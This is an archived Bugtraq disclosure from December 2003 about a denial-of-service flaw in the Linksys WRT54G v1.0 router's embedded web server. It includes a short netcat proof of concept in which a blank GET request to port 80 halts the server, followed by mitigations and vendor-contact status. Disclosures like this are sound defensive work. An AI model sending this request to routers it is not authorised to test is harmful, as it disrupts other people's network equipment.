Bugtraq mailing list archives

Linksys WRT54G Denial of Service Vulnerability

From: <test () techcentric net>
Date: 3 Dec 2003 22:35:26 -0000



Linksys WRT54G Denial of Service Vulnerability



System(s)
===========

Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)


Detail(s)
===========

Sending a blank GET request to the router on port 80 (or 8080) halts the embedded webserver.  This may allow an 
attacker to force the owner to reboot the router, allowing them to gain sensitive information during router 
authentication.

Exploitation
============

user@test:~$ nc 10.0.0.1 80
GET
user@test:~$ nc 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
user@test:~$

Solution(s)
============

- Https service should continue running for remote      access.
- Scan for sniffers that might be on the network before rebooting and performing any authentication.
- Wait for a vendor patch :)

Status
============

Vendor contacted on 12/03/03.


!HAPPY HOLIDAYS!
carbon () techcentric net - 12/02/03

Current thread:

Linksys WRT54G Denial of Service Vulnerability test (Dec 03)
- Re: Linksys WRT54G Denial of Service Vulnerability Michael Renzmann (Dec 04)
- <Possible follow-ups>
- Re: Linksys WRT54G Denial of Service Vulnerability Eerik . Kiskonen (Dec 05)